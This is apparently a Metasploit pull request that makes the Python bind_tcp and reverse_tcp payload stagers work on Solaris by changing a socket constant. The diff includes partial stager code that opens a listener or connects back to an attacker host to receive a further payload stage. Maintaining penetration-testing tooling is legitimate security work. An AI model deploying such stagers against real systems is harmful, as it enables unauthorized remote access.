### PR TITLE
Improve Python stager support for Solaris

### DIFF
--- a/modules/payloads/stagers/python/bind_tcp.rb
+++ b/modules/payloads/stagers/python/bind_tcp.rb
@@ -32,7 +32,7 @@ module Metasploit3
     cmd = ''
     # Set up the socket
     cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
+    cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
     cmd += "s.bind(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
     cmd += "s.listen(1)\n"
     cmd += "c,a=s.accept()\n"

--- a/modules/payloads/stagers/python/reverse_tcp.rb
+++ b/modules/payloads/stagers/python/reverse_tcp.rb
@@ -32,7 +32,7 @@ module Metasploit3
     cmd = ''
     # Set up the socket
     cmd += "import socket,struct\n"
-    cmd += "s=socket.socket(2,1)\n" # socket.AF_INET = 2, socket.SOCK_STREAM = 1
+    cmd += "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
     cmd += "s.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n"
     cmd += "l=struct.unpack('>I',s.recv(4))[0]\n"
     cmd += "d=s.recv(4096)\n"


### PR DESCRIPTION
This PR addresses an issue where both Python stagers would fail to connect when run from Solaris 11.1 with Python 2.6.8.   When the socket type was changed from '1' to the constant name 'socket.SOCK_STREAM' this issue was resolved.  The change adds 17 characters to the pre-base64 encoded payload and 24 characters to the base64 encoded payload.

I have tested the post change versions of the payload with:

Linux            / Python 2.7.5
OS X 10.8   /  Python 2.6.1
Solaris 11.1 / Python 2.6.8
Windows 7 /   Python 2.7.5.6  (ActiveState)

CC: @zeroSteiner
